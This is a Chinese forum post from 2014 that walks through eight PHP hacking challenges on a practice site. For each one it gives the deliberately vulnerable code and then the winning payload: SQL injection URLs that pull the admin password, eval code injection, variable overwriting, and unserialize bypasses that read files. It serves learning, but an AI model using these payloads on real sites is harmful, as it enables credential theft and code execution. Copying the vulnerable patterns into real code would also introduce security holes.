首页>服务器运维>Web服务器安全>php4fun.sinaapp.com PHP挑战通关攻略
回复
« 返回列表
sunjiabo
sunjiabo
U声U色
U声U色
  • UID27670
  • 粉丝1
  • 关注0
  • 发帖数1
  • 铜币12枚
  • 威望12点
  • 贡献0点
写私信
阅读:3418回复:0

php4fun.sinaapp.com PHP挑战通关攻略

楼主#
更多 发布于:2014-02-25 12:54
challenge 1

php code:
#!php#GOAL: get password from admin;error_reporting(0);require 'db.inc.php';function clean($str){ if(get_magic_quotes_gpc()){ $str=stripslashes($str); } return htmlentities($str, ENT_QUOTES);}$username = @clean((string)$_GET['username']);$password = @clean((string)$_GET['password']);$query='SELECT * FROM users WHERE name=''.$username.'' AND pass=''.$password.'';';$result=mysql_query($query);if(!$result || mysql_num_rows($result) < 1){ die('Invalid password!');}$row = mysql_fetch_assoc($result);echo "Hello ".$row['name']."</br>";echo "Your password is:".$row['pass']."</br>";攻略:

在单引号内的mysql注入,核心就是逃脱单引号,要么生成一个(htmlentities了单引号,不太可能),要么...干掉一个。
所以:

http://php4fun.sinaapp.com/c1/index.php?username=admin&password=%20or%201%23challenge 2

php code:
#!php#GOAL: gather some phpinfo();$str=@(string)$_GET['str'];eval('$str="'.addslashes($str).'";');攻略:

eval('$str="'.addslashes($str).'";');这段最后成为php代码 $str="",里双引号被addslashes,但内容在双引号内可以${${这里执行代码}}
所以:

http://phpchallenges2.sinaapp.com/index.php?str=${${phpinfo()}}challenge 3

php code:
#!php# GOAL: dump the info for the secret idrequire 'db.inc.php';$id = @(float)$_GET['id'];$secretId = 1;if($id == $secretId){ echo 'Invalid id ('.$id.').';}else{ $query = 'SELECT * FROM users WHERE id = ''.$id.'';'; $result = mysql_query($query); $row = mysql_fetch_assoc($result); echo "id: ".$row['id']."</br>"; echo "name:".$row['name']."</br>";}攻略:

主要是利用php和mysql对float数字型支持的精度不同,精度小的会忽略不能支持的位数。
所以:

http://php4fun.sinaapp.com/c3/index.php?id=1.0000000000001challenge 4

php code:
#!php#GOAL:get password from admin# $yourInfo=array(# 'id' => 1,# 'name' => 'admin',# 'pass' => 'xxx',# 'level' => 1# );require 'db.inc.php';$_CONFIG['extraSecure']=true;//if register globals = on, undo var overwritesforeach(array('_GET','_POST','_REQUEST','_COOKIE') as $method){ foreach($$method as $key=>$value){ unset($$key); }}$kw = isset($_GET['kw']) ? trim($_GET['kw']) : die('Please enter in a search keyword.');if($_CONFIG['extraSecure']){ $kw=preg_replace('#[^a-z0-9_-]#i','',$kw);}$query = 'SELECT * FROM messages WHERE message LIKE '%'.$kw.'%';';$result = mysql_query($query);$row = mysql_fetch_assoc($result);echo "id: ".$row['id']."</br>";echo "message: ".$row['message']."</br>";攻略:

这段$kw在单引号里,看起来只要能使用单引号就行,所以干掉_CONFIG['extraSecure']就ok,刚好前面画蛇添足的有可利用的变量unset(不然咋通关?),然后就是联合查询了。
所以:

http://php4fun.sinaapp.com/c4/index.php?kw='%20and%200%20union%20select%20name,pass%20from%20users%20where%20id=1%23&_CONFIG=aaachallenge 5

php code:
#!php# GOAL: overwrite password for admin (id=1)# Try to login as admin# $yourInfo=array( //this is your user data in the db# 'id' => 8,# 'name' => 'jimbo18714',# 'pass' => 'MAYBECHANGED',# 'level' => 1# );require 'db.inc.php';function mres($str) { return mysql_real_escape_string($str);}$userInfo = @unserialize($_GET['userInfo']);$query = 'SELECT * FROM users WHERE id = ''.mres($userInfo['id']).'' AND pass = ''.mres($userInfo['pass']).'';';$result = mysql_query($query);if(!$result || mysql_num_rows($result) < 1){ die('Invalid password!');}$row = mysql_fetch_assoc($result);foreach($row as $key => $value){ $userInfo[$key] = $value;}$oldPass = @$_GET['oldPass'];$newPass = @$_GET['newPass'];if($oldPass == $userInfo['pass']){ $userInfo['pass'] = $newPass; $query = 'UPDATE users SET pass = ''.mres($newPass).'' WHERE id = ''.mres($userInfo['id']).'';'; mysql_query($query); echo 'Password Changed.';}else{ echo 'Invalid old password entered.';}攻略:

(1) http://www.80vul.com/webzine&#95;◆6/PSTZine&#95;◆6_◆3.txt (站上默认显示的密码就是个提示...估计是哪位大虾顺手改的)(2) $userInfo['pass'] = $newPass; //这句,改成1
所以:

(1) 修改jimbo18714密码为8 (2) 再次修改密码,提交时userInfo为8的序列化,newPass为1
challenge 6

php code:
#!php#GOAL: get the secret;class just4fun { var $enter; var $secret;}if (isset($_GET['pass'])) { $pass = $_GET['pass']; if(get_magic_quotes_gpc()){ $pass=stripslashes($pass); } $o = unserialize($pass); if ($o) { $o->secret = "?????????????????????????????"; if ($o->secret === $o->enter) echo "Congratulation! Here is my secret: ".$o->secret; else echo "Oh no... You can't fool me"; } else echo "are you trolling?";}攻略:

serialize一个just4fun的对象,序列化之前先赋值给$o->enter (在本地执行是成功的,php4fun.sinaapp.com不行,代码改了?)
所以:
(1) 生成序列化的对象
#!phpclass just4fun { var $enter; var $secret;}$a=new just4fun();$a->enter='?????????????????????????????';echo urlencode(serialize($a));(2)
link?pass=O%3A8%3A%22just4fun%22%3A2%3A%7Bs%3A5%3A%22enter%22%3Bs%3A29%3A%22%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%22%3Bs%3A6%3A%22secret%22%3BN%3B%7Dchallenge 7

php code:
#!php# GOAL: get the key from $hidden_password[207]session_start();error_reporting(0);function auth($password, $hidden_password) { $res = 0; if(isset($password) && $password != "") { if($password == $hidden_password) { $res = 1; } } $_SESSION["logged"] = $res; return $res;}function display($res){ $aff = htmlentities($res); return $aff;}if(!isset($_SESSION["logged"])) $_SESSION["logged"] = 0;$aff = "";include("config.inc.php");foreach($_REQUEST as $request) { if(is_array($request)) { die("Can not use Array in request!"); }}$password = $_POST["password"];if(!ini_get("register_globals")) { $superglobals = array($_POST, $_GET); if(isset($_SESSION)) { array_unshift($superglobals, $_SESSION); } foreach($superglobals as $superglobal) { extract($superglobal, 0); }}if((isset($password) && $password != "" && auth($password, $hidden_password[207]) == 1) || (is_array($_SESSION) && $_SESSION["logged"] == 1)) { $aff = display("$hidden_password[207]");} else { $aff = display("Try again");}echo $aff;攻略:

get the key from $hidden_password[207] 这句有点模糊,下面的‘所以’可以得到key(绕过REQUEST对数组的判断)
所以:

http://php4fun.sinaapp.com/c7/index.php?_SESSION[logged]=1POST: _SESSION=1challenge 8

php code:
#!php#GOAL: file_get_content('sbztz.php') : ) class just4fun { public $filename; function __toString() { return @file_get_contents($this->filename); } } $data = stripslashes($_GET['data']); if (!$data) { die("hello from y"); } $token = $data[0]; $pass = true; switch ( $token ) { case 'a' : case 'O' : case 'b' : case 'i' : case 'd' : $pass = ! (bool) preg_match( "/^{$token}:[0-9]+:/s", $data ); break; default: $pass = false; } if (!$pass) { die("TKS L.N."); } echo unserialize($data);攻略:

http://drops.wooyun.org/papers/596
http://zone.wooyun.org/content/6697
所以:

(1) 生成利用的data:
O%3A%2B8%3A"just4fun"%3A1%3A%7Bs%3A8%3A"filename"%3Bs%3A9%3A"sbztz.php"%3B%7D (注意%2B)(2)
http://php4fun.sinaapp.com/c8/index.php?data=O%3A%2B8%3A"just4fun"%3A1%3A%7Bs%3A8%3A"filename"%3Bs%3A9%3A"sbztz.php"%3B%7D
喜欢11 评分0
回复
游客
关于UPUPW帮助中心技术问答手机浏览相关链接

©2013-2023 UPUPW绿色服务器平台 保留所有权利. 官方唯一网址UPUPW.NET 请勿用此环境运行非法站点,UPUPW不承担相关责任! [京] ICP备07028424号-2

UPUPW ANK V1.1.8正式版驱动 - 页面执行时间0.030711秒

返回顶部